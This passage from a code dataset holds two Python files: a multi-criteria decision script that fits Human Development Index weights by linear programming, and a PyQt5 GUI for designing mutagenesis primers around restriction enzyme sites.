"ddcmpolicy.DDCMPolicy", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "27986491672", "text": "import argparse\nimport numpy as np\nimport pandas as pd\nfrom scipy.optimize import linprog\n\n\ndef extract_data(filename: str, preferences: [(str, str), ...]) -> (\n        pd.core.frame.DataFrame,\n        np.ndarray,\n        [(int, int), ...]):\n    \"\"\"\n    Extracts the needed data here, from the database at http://hdr.undp.org/en/composite/HDI\n    Removes the first and last lines that are irrelevant for the study as they contain no actual data.\n    Also extracts a matrix of data without country names and translates a list of preferences into their\n    indices counterparts.\n\n    Args\n    ----\n    filename: str\n        the name of the file where the data is located.\n    preferences: [(str, str), ...]\n        the preferences of the decision makers.\n        for instance, the (\"Oman\", \"Brazil\") pair means that Oman is preferred to Brazil.\n\n    Returns\n    -------\n    df: pandas.core.frame.DataFrame\n        the whole dataframe of HDI quantities. Education has been computed as the average of\n        (a) mean years of schooling for adults aged 25 years and over, and\n        (b) expected years for schooling for children of school entering age\n        Contains 192 rows, 4 columns and has the following head:\n                          Country  Health       Wealth  Education\n        0                  Norway   82.40  66494.25217  15.481950\n        1                 Ireland   82.31  68370.58737  15.685810\n        2             Switzerland   83.78  69393.52076  14.854626\n        3  Hong Kong, China (SAR)   84.86  62984.76553  14.604715\n        4                 Iceland   82.99  54682.38057  15.927938\n    f: np.ndarray\n        the sub matrix with all the fij coefficients in the direct comparisons of a subset\n        of alternatives method, i.e. only the Health, Wealth and Education columns in a matrix.\n    prefs: [(int, int), ...])\n        the list of indices for all the preferences.\n\n    \"\"\"\n    # extract the data and remove useless lines.\n    df = pd.read_excel(filename,\n                       header=None,\n                       usecols=\"B,E,G,I,K\",\n                       skiprows=list(range(8)) + list(range(200, 271)),\n                       names=[\"Country\", \"Health\", \"Education_exp\", \"Education_curr\", \"Wealth\"])\n\n    # replace the education* columns by their mean.\n    df[\"Education\"] = (df[\"Education_exp\"] + df[\"Education_curr\"])/2\n    df = df.drop(\"Education_curr\", axis=1).drop(\"Education_exp\", axis=1)\n\n    # normalize the three criteria between 0 and 1.\n    criteria = [\"Health\", \"Education\", \"Wealth\"]\n    for crit in criteria:\n        df[crit] = (df[crit] - df[crit].min()) / (df[crit].max() - df[crit].min())\n\n    # extract the matrix of raw data, called f in the class.\n    f = df.iloc[:, 1:].values\n\n    # interprets the preferences.\n    for i, pref in enumerate(preferences):\n        # extract the corresponding indices.\n        preferences[i] = (df.index[df[\"Country\"] == pref[0]].tolist()[0],\n                          df.index[df[\"Country\"] == pref[1]].tolist()[0])\n    return df, f, preferences\n\n\ndef prepare_lin_prog(f: np.ndarray, prefs_idx: [(str, str), ...], j: int, t: int, n: int,\n                     delta: float = 0.1, verbose: bool = False) -> (\n        np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray, list):\n    \"\"\"\n    Args\n    ----\n    f\n    prefs\n    j\n    t\n    n\n    verbose\n\n    Returns\n    -------\n    c, A_ub, b_ub, A_eq, b_eq, bounds\n    \"\"\"\n    # n is the total number of variables.\n    # minimize their sum with scipy.\n    # first j components are the weights corresponding to the j variables.\n    # last t components are the errors associated with the preferences.\n    c = np.ones(n)\n\n    # scipy receives A_ub and b_ub such that, A_ub @ x <= b_ub\n    # we need to construct A_ub and b_ub s.t.\n    # (f_i0 - f_k0)*w_0 + (f_i1 - f_k1)*w_1 + ... + (f_ij - f_kj)*w_j + e_ik > delta_ik for all i,k s.t. i is preferred to k\n
    # which corresponds to the line\n    # f[prefs_idx[0][0], 0]-f[prefs_idx[0][1], 0], f[prefs_idx[0][0], 1]-f[prefs_idx[0][1], 1], f[prefs_idx[0][0], 2]-f[prefs_idx[0][1], 2], 1, 0, 0, 0, 0, 0, 0, 0\n    # because prefs_idx[...][0] is i and prefs_idx[...][1] is k.\n    # we also need to negate the matrices because the inequality is inverted in scipy.\n    A_ub = -np.array([\n        [f[prefs_idx[0][0], 0]-f[prefs_idx[0][1], 0], f[prefs_idx[0][0], 1]-f[prefs_idx[0][1], 1], f[prefs_idx[0][0], 2]-f[prefs_idx[0][1], 2], 1, 0, 0, 0, 0, 0, 0, 0],\n        [f[prefs_idx[1][0], 0]-f[prefs_idx[1][1], 0], f[prefs_idx[1][0], 1]-f[prefs_idx[1][1], 1], f[prefs_idx[1][0], 2]-f[prefs_idx[1][1], 2], 0, 1, 0, 0, 0, 0, 0, 0],\n        [f[prefs_idx[2][0], 0]-f[prefs_idx[2][1], 0], f[prefs_idx[2][0], 1]-f[prefs_idx[2][1], 1], f[prefs_idx[2][0], 2]-f[prefs_idx[2][1], 2], 0, 0, 1, 0, 0, 0, 0, 0],\n        [f[prefs_idx[3][0], 0]-f[prefs_idx[3][1], 0], f[prefs_idx[3][0], 1]-f[prefs_idx[3][1], 1], f[prefs_idx[3][0], 2]-f[prefs_idx[3][1], 2], 0, 0, 0, 1, 0, 0, 0, 0],\n        [f[prefs_idx[4][0], 0]-f[prefs_idx[4][1], 0], f[prefs_idx[4][0], 1]-f[prefs_idx[4][1], 1], f[prefs_idx[4][0], 2]-f[prefs_idx[4][1], 2], 0, 0, 0, 0, 1, 0, 0, 0],\n        [f[prefs_idx[5][0], 0]-f[prefs_idx[5][1], 0], f[prefs_idx[5][0], 1]-f[prefs_idx[5][1], 1], f[prefs_idx[5][0], 2]-f[prefs_idx[5][1], 2], 0, 0, 0, 0, 0, 1, 0, 0],\n        [f[prefs_idx[6][0], 0]-f[prefs_idx[6][1], 0], f[prefs_idx[6][0], 1]-f[prefs_idx[6][1], 1], f[prefs_idx[6][0], 2]-f[prefs_idx[6][1], 2], 0, 0, 0, 0, 0, 0, 1, 0],\n        [f[prefs_idx[7][0], 0]-f[prefs_idx[7][1], 0], f[prefs_idx[7][0], 1]-f[prefs_idx[7][1], 1], f[prefs_idx[7][0], 2]-f[prefs_idx[7][1], 2], 0, 0, 0, 0, 0, 0, 0, 1]\n    ])\n    b_ub = -np.ones(t) * delta\n\n    # scipy receives A_eq and b_eq such that, A_eq @ x == b_eq\n    # we want that the weights sum to 1.\n    A_eq = np.concatenate((\n        np.ones((j, 1)), \n        np.zeros((t, 1)))).transpose()\n    b_eq = np.ones(1)\n\n    # all errors e_ik and weights w_j are positive.\n    bounds = [(0, None)] * n\n\n    if verbose:\n        print(c, c.shape)\n        print(A_ub, A_ub.shape, b_ub, b_ub.shape)\n        print(A_eq, A_eq.shape, b_eq, b_eq.shape)\n        print(bounds)\n\n    return c, A_ub, b_ub, A_eq, b_eq, bounds\n\n\ndef main(filename, delta, verbose=False):\n    # extract all the data.\n    preferences = [(\"Oman\", \"Brazil\"), (\"Ireland\", \"Portugal\"),\n                   (\"Turkey\", \"Ukraine\"), (\"Zimbabwe\", \"Haiti\"),\n                   (\"Japan\", \"Estonia\"), (\"Algeria\", \"Panama\"),\n                   (\"Kenya\", \"India\"), (\"Peru\", \"Romania\")]\n    df, f, prefs = extract_data(filename, preferences)\n\n    t = len(prefs)\n    j = f.shape[1]\n    n = t + j\n\n    # get everything for solving time.\n    c, A_ub, b_ub, A_eq, b_eq, bounds = prepare_lin_prog(f, prefs, j, t, n, delta=delta, verbose=verbose)\n\n    # solve the problem.\n    res = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq, bounds=bounds)\n    if verbose:\n        print(res)\n    w = res.x[:3]\n    print(f\"weights found: {w}\")\n    if verbose:\n        print(f\"sum of weights: {np.sum(w)}, sum of errors: {np.sum(res.x[3:])}\")\n        print()\n\n    # scores and ranking according to the direct comparisons method.\n    scores = np.dot(f, w)\n    ranks = np.argsort(scores)\n    ranking = [df[\"Country\"][r] for r in ranks]\n    if verbose:\n        print(\"scores:\", scores)\n        print(\"ranks:\", ranks)\n        print(\"ranking:\", ranking)\n        print()\n\n    for i, k in preferences:\n        print(f\"{scores[i]: 5.4f}, {scores[k]: 5.4f}\", \"inconsistent\" if scores[i] <= scores[k] else \"consistent\")\n    print()\n\n    # questions 4.\n    canada = df[df[\"Country\"] == \"Canada\"].index\n    print(\"canada:\", 
ranks[canada][0])\n\n df[\"HDI\"] = (df[\"Health\"] * df[\"Education\"] * df[\"Wealth\"]) ** (1/3)\n sorted_df = df.sort_values(\"HDI\")\n hdi_canada = df[\"HDI\"][df[\"Country\"] == \"Canada\"].values[0]\n hdis = sorted_df[\"HDI\"].values[:-3][::-1]\n if verbose:\n print()\n print(\"hdis:\", hdis)\n print(\"hdi of canada:\", hdi_canada)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", type=str, default=\"2020_Statistical_Annex_Table_1.xlsx\",\n help=\"The path to the excel file (defaults to '2020_Statistical_Annex_Table_1.xlsx').\")\n parser.add_argument(\"-d\", \"--delta\", type=float, default=0.1,\n help=\"The value of all the right hand side of the equations for the direct method (defaults to 0.1).\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Triggers the full verbose if raised.\")\n args = parser.parse_args()\n main(args.input, args.delta, args.verbose)\n", "repo_name": "amtoine/mcdm", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_excel", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.core", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 74, "usage_type": "attribute"}, {"api_name": "scipy.optimize.linprog", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 160, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "720210428", "text": "import sys\n\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QSize\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QMainWindow, QMessageBox, QLabel, QGridLayout, QWidget, qApp, QAction, QGroupBox, \\\n    QHBoxLayout, QVBoxLayout, QListWidget, QLineEdit, QPushButton, QTabWidget, QTableWidget, QTableWidgetItem, \\\n    QTextEdit\nfrom PyQt5.QtWidgets import QSpinBox\n\nfrom main.aho_korasick.search import AhoKorasickSearch\nfrom main.aho_korasick_wildcard.wildcard_search import AhoKorasickWildcard\n# from main.bitap_search.pattern import Pattern\nfrom main.bitap_search.custom_bitap import CustomBitapSearch\nfrom main.utils.enzymes_reader import EnzymesReader\n\n\n# Inherit from QMainWindow\nfrom main.utils.search_results_helper import TransformationHelper\n\n\nclass MainWindow(QMainWindow):\n    # Override the class constructor\n    IMAGES_PATH = 'resources/static/images/'\n\n    def __init__(self):\n        # The superclass constructor must be called\n        super().__init__()\n        self.tabs = QTabWidget()\n        self.seq_line_edit = QTextEdit()\n        self.table_widget = QTableWidget()\n        self.mutationPosition = QSpinBox(self)\n        self.enzymes_reader = EnzymesReader()\n        self.search_engine = AhoKorasickSearch(self.enzymes_reader.get_sib_simple_patterns(),\n                                               self.enzymes_reader.get_neb_simple_pattens())\n        self.search_engine_wildcard = AhoKorasickWildcard(self.enzymes_reader.get_sib_wildcard_patterns(),\n                                                          self.enzymes_reader.get_neb_wildcard_patterns())\n        # p1 = Pattern('GAA', ['name1', 'name11'])\n        # p2 = Pattern('NCCT', ['name2'])\n        # p3 = Pattern('TAAG', ['name3'])\n        # p4 = Pattern('GTG', ['name4'])\n        # pats = [p1, p2, p3, p4]\n        self.build_primers_engine = CustomBitapSearch(self.enzymes_reader.get_all_sib_patterns(), 2)\n        self.build_primers_engine_neb = CustomBitapSearch(self.enzymes_reader.get_all_neb_patterns(), 2)\n        self.init_ui()\n\n    def init_ui(self):\n        self.setMinimumSize(QSize(480, 320)) # Set the minimum window size\n        self.setWindowTitle(\"Mutagenesis primer designer\") # Set the window title\n        self.setWindowIcon(QIcon(self.IMAGES_PATH + 'main.png'))\n        self.statusBar().showMessage('Ready to start work')\n        central_widget = QWidget(self) # Create the central widget\n        self.setCentralWidget(central_widget) # Set the central widget\n\n        self.init_menu()\n        self.create_tool_bar()\n\n        main_layout = QHBoxLayout(self)\n        central_widget.setLayout(main_layout)\n\n        # self.tabs = QTabWidget()\n        tab_neb = QWidget()\n        tab_sib = QWidget()\n        # Add tabs\n        self.tabs.addTab(tab_neb, \"NEB\")\n        self.tabs.addTab(tab_sib, \"SibEnzymes\")\n\n        # Create first, second tab\n        # TODO: use getters\n        self.create_enzymes_list(tab_neb, self.enzymes_reader.get_neb_enzymes_data())\n        self.create_enzymes_list(tab_sib, self.enzymes_reader.get_sib_enzymes_data())\n        # Add tabs to widget\n        main_layout.addWidget(self.tabs, 1)\n\n        # Create font\n        font_9_pt = QtGui.QFont()\n        font_9_pt.setPointSizeF(9)\n\n        right_widget = QWidget()\n        right_layout = QVBoxLayout()\n        seq_group_box = QGroupBox(\"Enter a sequence:\")\n        seq_group_box.setFont(font_9_pt)\n        seq_layout = QHBoxLayout()\n        self.seq_line_edit.cursorPositionChanged.connect(self.cursor_position)\n        seq_layout.addWidget(self.seq_line_edit)\n        # seq_grid_layout = QGridLayout()\n        # seq_grid_layout.setSpacing(10)\n        # seq_label = QLabel(\"Enter a sequence:\")\n        # #seq_line_edit = QLineEdit()\n        # seq_line_edit = QTextEdit()\n        # seq_search_button = QPushButton(\"Search\")\n        # primer_label = QLabel(\"Primer:\")\n
        # # primer_label.setFont(font_11_pt)\n        # primer_label_1 = QLabel(\"\")\n        # build_primer_button = QPushButton(\"Build Primer\")\n        # seq_grid_layout.addWidget(seq_label, 0, 0)\n        # seq_grid_layout.addWidget(seq_line_edit, 0, 1, 2, 1)\n        # seq_grid_layout.addWidget(seq_search_button, 0, 2)\n        # seq_grid_layout.addWidget(primer_label, 2, 0)\n        # seq_grid_layout.addWidget(primer_label_1, 1, 1)\n        # seq_grid_layout.addWidget(build_primer_button, 1, 2)\n        # seq_group_box.setLayout(seq_grid_layout)\n\n        seq_group_box.setLayout(seq_layout)\n        right_layout.addWidget(seq_group_box, 1)\n\n        right_layout.addWidget(self.table_widget, 4)\n\n        right_widget.setLayout(right_layout)\n\n        main_layout.addWidget(right_widget, 3)\n\n    def init_menu(self):\n        # Create the Action that will be used to exit the application\n        exit_action = QAction(QIcon(self.IMAGES_PATH + 'exit.png'), \"&Exit\", self)\n        exit_action.setShortcut('Ctrl+Q') # Assign a hotkey to it\n        exit_action.setStatusTip('Exit application')\n        # Connect the triggered signal to the quit slot of qApp.\n        # the signal and slot syntax in PyQt5 differs noticeably from the one\n        # used in Qt5 C++\n        exit_action.triggered.connect(qApp.quit)\n        self.statusBar()\n        # Add this Action to the menu bar.\n        menu_bar = self.menuBar()\n        file_menu = menu_bar.addMenu('&File')\n        file_menu.addAction(exit_action)\n        tools_menu = menu_bar.addMenu('&Tools')\n        refresh_sibenzym_action = QAction(QIcon(self.IMAGES_PATH + 'refresh_se.png'), \"&Refresh SibEnzym\", self)\n        tools_menu.addAction(refresh_sibenzym_action)\n        help_menu = menu_bar.addMenu('&Help')\n        about_action = QAction(\"&About\", self)\n        help_menu.addAction(about_action)\n\n    def create_tool_bar(self):\n        toolbar = self.addToolBar('ToolBar')\n\n        cutAction = QAction(QtGui.QIcon(self.IMAGES_PATH + 'cut.png'), \"Cut to clipboard\", self)\n        cutAction.setStatusTip(\"Delete and copy text to clipboard\")\n        cutAction.setShortcut(\"Ctrl+X\")\n        cutAction.triggered.connect(self.seq_line_edit.cut)\n\n        copyAction = QAction(QtGui.QIcon(self.IMAGES_PATH + \"copy.png\"), \"Copy to clipboard\", self)\n        copyAction.setStatusTip(\"Copy text to clipboard\")\n        copyAction.setShortcut(\"Ctrl+C\")\n        copyAction.triggered.connect(self.seq_line_edit.copy)\n\n        pasteAction = QAction(QtGui.QIcon(self.IMAGES_PATH + \"paste.png\"), \"Paste from clipboard\", self)\n        pasteAction.setStatusTip(\"Paste text from clipboard\")\n        pasteAction.setShortcut(\"Ctrl+V\")\n        pasteAction.triggered.connect(self.seq_line_edit.paste)\n\n        toolbar.addAction(cutAction)\n        toolbar.addAction(copyAction)\n        toolbar.addAction(pasteAction)\n        toolbar.addSeparator()\n\n        positionLabel = QLabel(\"Enter position: \", self)\n        self.mutationPosition.setMinimum(0)\n        self.mutationPosition.setMaximum(50000)\n        self.mutationPosition.setValue(0)\n        toolbar.addWidget(positionLabel)\n        toolbar.addWidget(self.mutationPosition)\n\n        search_action = QAction(QIcon(self.IMAGES_PATH + 'find.png'), \"&Search for restriction sites\", self)\n        search_action.setStatusTip(\"Search for restriction sites\")\n        search_action.triggered.connect(self.on_search_btn_clicked)\n\n        build_primers_action = QAction(QIcon(self.IMAGES_PATH + 'primers.png'), \"&Build primers\", self)\n        build_primers_action.setStatusTip(\"Build primers\")\n        build_primers_action.triggered.connect(self.on_build_primers_btn_clicked)\n\n        toolbar.addAction(search_action)\n        toolbar.addAction(build_primers_action)\n        #toolbar.addSeparator()\n\n    def create_enzymes_list(self, tab, enzymes_data):\n        # enzymes_list = QListWidget()\n        # 
enzymes_list.addItems(enzymes_data)\n # tab.layout = QVBoxLayout()\n # tab.layout.addWidget(enzymes_list)\n # tab.setLayout(tab.layout)\n header_labels = ['Name', 'Top site', 'Bottom site']\n enzymes_table = QTableWidget(len(enzymes_data), 3)\n enzymes_table.setHorizontalHeaderLabels(header_labels)\n horizontal_header = enzymes_table.horizontalHeader()\n horizontal_header.setStretchLastSection(True)\n for enzyme_row in enzymes_data:\n index = enzymes_data.index(enzyme_row)\n enzymes_table.setItem(index, 0, QTableWidgetItem(enzyme_row.e_name))\n enzymes_table.setItem(index, 1, QTableWidgetItem(enzyme_row.top_site))\n enzymes_table.setItem(index, 2, QTableWidgetItem(enzyme_row.bottom_site))\n tab.layout = QVBoxLayout()\n tab.layout.addWidget(enzymes_table)\n tab.setLayout(tab.layout)\n\n def create_sr_table(self, grid_layout):\n return\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n def on_radio_button_toggled(self):\n radiobutton = self.sender()\n if radiobutton.isChecked():\n # TODO:\n # self.statusBar().showMessage('Selected enzymes type is %s') % radiobutton.e_type\n print(\"test %s\" % radiobutton.e_type)\n\n def on_search_btn_clicked(self):\n # search_btn = self.sender()\n self.statusBar().showMessage(\"Search for restriction sites\")\n sequence_text = self.seq_line_edit.toPlainText().replace(\" \", \"\").replace('\\n', '')\n current_tab = self.tabs.currentIndex()\n # TODO: create the same for NEB tab\n # TODO: parallel processing for usual patterns and wildcard ones\n if current_tab == 1: # SibTab\n search_results = self.search_engine.sib_traverse(sequence_text)\n search_results_wildcard = self.search_engine_wildcard.do_sib_search(sequence_text)\n if current_tab == 0: # NebTab\n search_results = self.search_engine.neb_traverse(sequence_text)\n search_results_wildcard = self.search_engine_wildcard.do_neb_search(sequence_text)\n results_for_table = TransformationHelper.transform_results(search_results, search_results_wildcard)\n self.show_search_results_table(results_for_table)\n\n def on_build_primers_btn_clicked(self):\n self.statusBar().showMessage(\"Build primers\")\n mpos_value = self.mutationPosition.value() - 1\n sequence_text = self.seq_line_edit.toPlainText().replace(\" \", \"\").replace('\\n', '')\n current_tab = self.tabs.currentIndex()\n if current_tab == 1: # SibTab\n primers_results = self.build_primers_engine.bitap_search(sequence_text, mpos_value)\n # TODO: Neb tab\n if current_tab == 0: # NebTab\n primers_results = self.build_primers_engine_neb.bitap_search(sequence_text, mpos_value)\n self.show_build_primers_results_table(primers_results)\n\n def show_search_results_table(self, search_results):\n header_labels = ['Name', 'Sequence', 'Site Length', 'Frequency', 'Cut Positions']\n self.table_widget.setRowCount(len(search_results))\n self.table_widget.setColumnCount(5)\n self.table_widget.setHorizontalHeaderLabels(header_labels)\n horizontal_header = self.table_widget.horizontalHeader()\n horizontal_header.setStretchLastSection(True)\n for site_item in search_results:\n index = search_results.index(site_item)\n self.table_widget.setItem(index, 0, QTableWidgetItem(str(site_item.get_site_names())))\n self.table_widget.setItem(index, 1, QTableWidgetItem(site_item.get_site_sequence()))\n self.table_widget.setItem(index, 2, QTableWidgetItem(str(site_item.get_site_length())))\n 
self.table_widget.setItem(index, 3, QTableWidgetItem(str(site_item.get_frequency())))\n self.table_widget.setItem(index, 4, QTableWidgetItem(str(site_item.get_cut_positions())))\n\n def show_build_primers_results_table(self, primers_results):\n header_labels = ['Site Names', 'Sequence', 'Site with mismatch', 'Site start position', 'Mismatch positions',\n 'Primer', 'Primer type']\n row_count = 0\n for site, mismatched_sites in primers_results.items():\n row_count += len(mismatched_sites)\n self.table_widget.setRowCount(row_count)\n self.table_widget.setColumnCount(7)\n self.table_widget.setHorizontalHeaderLabels(header_labels)\n index = -1\n for site, mismatched_sites in primers_results.items():\n # index = pr_results.index(site_item)\n row_count += len(mismatched_sites)\n for found_mismatched_site in mismatched_sites:\n index += 1\n self.table_widget.setItem(index, 0, QTableWidgetItem(str(site.get_names())))\n self.table_widget.setItem(index, 1, QTableWidgetItem(site.get_seq()))\n self.table_widget.setItem(index, 2, QTableWidgetItem(found_mismatched_site.get_enzyme_with_mismatch()))\n self.table_widget.setItem(index, 3, QTableWidgetItem(str(found_mismatched_site\n .get_start_pos() + 1)))\n self.table_widget.setItem(index, 4, QTableWidgetItem(str([pos + 1 for pos in found_mismatched_site\n .get_mismatch_positions()])))\n primer = found_mismatched_site.get_primer()\n self.table_widget.setItem(index, 5, QTableWidgetItem(primer.get_primer_sequence()))\n primer_type = (\"Forward\" if primer.get_is_forward() else \"Reverse\")\n self.table_widget.setItem(index, 6, QTableWidgetItem(primer_type))\n self.table_widget.resizeRowsToContents()\n self.table_widget.resizeColumnsToContents()\n horizontal_header = self.table_widget.horizontalHeader()\n horizontal_header.setStretchLastSection(True)\n\n def cursor_position(self):\n cursor_pos = self.seq_line_edit.textCursor().position()\n seq = self.seq_line_edit.toPlainText()\n seq_part = seq[:cursor_pos].replace(\" \", \"\").replace('\\n', '')\n pos = len(seq_part)\n # Mortals like 1-indexed things\n # line = cursor.blockNumber() + 1\n # col = cursor.columnNumber()\n self.statusBar().showMessage(\"Cursor position: {}\".format(pos))\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n mw = MainWindow()\n mw.showMaximized() # show()\n sys.exit(app.exec())\n", "repo_name": "ppnati33/primer_designer", "sub_path": "main/ui/MainWindow.py", "file_name": "MainWindow.py", "file_ext": "py", "file_size_in_byte": 15009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QSpinBox", "line_number": 33, "usage_type": "call"}, {"api_name": "main.utils.enzymes_reader.EnzymesReader", "line_number": 34, "usage_type": "call"}, {"api_name": "main.aho_korasick.search.AhoKorasickSearch", "line_number": 35, "usage_type": "call"}, {"api_name": "main.aho_korasick_wildcard.wildcard_search.AhoKorasickWildcard", "line_number": 37, "usage_type": "call"}, {"api_name": "main.bitap_search.custom_bitap.CustomBitapSearch", "line_number": 44, "usage_type": "call"}, {"api_name": "main.bitap_search.custom_bitap.CustomBitapSearch", 
"line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 53, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 59, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 63, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 64, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 77, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QGroupBox", "line_number": 82, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 116, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.qApp.quit", "line_number": 122, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.qApp", "line_number": 122, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 129, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 129, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 132, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 138, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 138, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 143, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 143, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 148, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 148, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 148, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 158, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 165, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 165, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAction", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 169, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 190, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 191, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 192, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 193, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 201, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 201, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Yes", "line_number": 201, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.No", "line_number": 201, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.No", 
"line_number": 202, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 202, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Yes", "line_number": 203, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 203, "usage_type": "name"}, {"api_name": "main.utils.search_results_helper.TransformationHelper.transform_results", "line_number": 228, "usage_type": "call"}, {"api_name": "main.utils.search_results_helper.TransformationHelper", "line_number": 228, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 252, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 253, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 254, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 255, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 256, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 273, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 274, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 275, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 276, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 278, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 281, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 283, 